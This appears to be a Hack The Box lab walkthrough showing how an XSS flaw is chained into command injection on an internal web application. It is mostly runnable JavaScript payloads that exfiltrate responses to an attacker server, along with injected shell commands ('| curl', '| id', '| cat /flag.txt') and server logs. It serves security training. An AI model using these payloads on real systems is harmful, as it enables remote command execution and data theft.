Exploiting internal Web Applications II

After discussing how to exploit a SQL injection vulnerability in an internal web application through an XSS vulnerability, we will explore how to exploit a command injection vulnerability through XSS in this section. While the methodology is the same, it is crucial to understand it well since the process is complex but powerful. A thorough understanding can help in the identification of complex real-world vulnerabilities.

Identifying the Vulnerability

The identification process is essentially identical as discussed in the previous section. We will use the same base XSS payload, and the admin endpoint contains a reference to another internal web application at https://internal.internal-webapps-2.htb. We can use the following payload to exfiltrate the index of the internal web application:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://internal.internal-webapps-2.htb/', false);
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This reveals the following HTML content, which indicates that we can use the web application to check the status of different web applications:

HTML form to select a web application with radio buttons for different URLs and a submit button labeled 'Check.'

We can craft the corresponding POST request by analyzing the form to identify how exactly the web application implements this functionality:

var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://internal-webapps-2.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This results in the following response:

HTTP/1.1 200 OK

Let us try a non-existing domain to see if we can provoke an error message:

var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://doesnotexist.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This results in the following response:

curl: (6) Could not resolve host: doesnotexist.htb

As we can see, the status seems to be obtained using curl. If this is improperly implemented or there is no proper sanitization, there is a potential command injection vulnerability. We can verify this by injecting an additional curl command to the exfiltration server:

var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| curl -k https://10.10.14.144:4443?pwn")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

Afterward, we can see the expected request in the exfiltration server, thus confirming the command injection vulnerability:

kabaneridev@htb[/htb]$ python3 server.py 

10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /?pwn HTTP/1.1" 200 -
10.129.233.62 - - [01/Jan/2025 15:10:56] code 404, message File not found
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /exfil?r=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEiPgo8L2hlYWQ+Cgo8Ym9keT4KCiAgICA8aDI+Q2hlY2sgU3RhdHVzPC9oMj4KCiAgICA8ZGl2IGNsYXNzPSJtb2RhbCI+CiAgICAgICAgICAlIFRvdGFsICAgICUgUmVjZWl2ZWQgJSBYZmVyZCAgQXZlcmFnZSBTcGVlZCAgIFRpbWUgICAgVGltZSAgICAgVGltZSAgQ3VycmVudAoKICAgIDwvZGl2PgoKICAgIDxkaXYgY2xhc3M9Im1vZGFsIj4KCiAgICAgICAgPGZvcm0gYWN0aW9uPSIvY2hlY2siIG1ldGhvZD0icG9zdCI+CgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGI+U2VsZWN0IHRoZSBXZWIgQXBwbGljYXRpb248L2I+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGlkPSJtYWluIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2ludGVybmFsLXdlYmFwcHMtMi5odGIiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0ibWFpbiI+aW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iaW50ZXJuYWwiIG5hbWU9IndlYmFwcF9zZWxlY3RvciIgdmFsdWU9Imh0dHBzOi8vaW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YiI+CiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJpbnRlcm5hbCI+aW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iYXBpIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2FwaS5pbnRlcm5hbC13ZWJhcHBzLTIuaHRiIj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9ImFwaSI+YXBpLmludGVybmFsLXdlYmFwcHMtMi5odGI8L2xhYmVsPgoKICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0ic3VibWl0Ij5DaGVjazwvYnV0dG9uPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0+CiAgICA8L2Rpdj4KCjwvYm9keT4KCjwvaHRtbD4= HTTP/1.1" 404 -

Exploiting the Vulnerability

We can specify the command injection payload in our XSS payload and exfiltrate the result to the exfiltration server. The exploitation does thus not differ from other command injection vulnerabilities. For instance, we can execute the id command:

var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| id")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

The result is contained in the base64-encoded response:

uid=0(root) gid=0(root) groups=0(root)

Exploiting internal Web Applications II Questions

Question 1: Exploit the XSS vulnerability to target the internal web application and obtain the flag.

  1. Add the necessary vHosts to your /etc/hosts file:

    sudo sh -c 'echo "10.129.233.62 exploitserver.htb internal-webapps-2.htb" >> /etc/hosts'

  2. Log in to the vulnerable site (https://internal-webapps-2.htb) using the credentials htb-stdnt:...!.

  3. Submit your base XSS payload as a guestbook entry:

    <script src="https://exploitserver.htb/exploit"></script>

  4. Prepare a payload on the exploit server (https://exploitserver.htb), attempting to exploit the command injection vulnerability on the internal site identified in the section's reading. Students need to have the payload execute the command cat /flag.txt, and have the output sent to the exfiltration server:

    var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| cat /flag.txt")}`;

xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(params);

var exfil = new XMLHttpRequest(); exfil.open("GET", "https://PWNIP:PWNPO/exfil?r=" + btoa(xhr.responseText), false); exfil.send(); ``` 5. After the victim triggers the payload, decode the Base64 encoded blob to reveal the flag.

PreviousExploiting internal Web Applications INextContent-Security Policy (CSP)

Last updated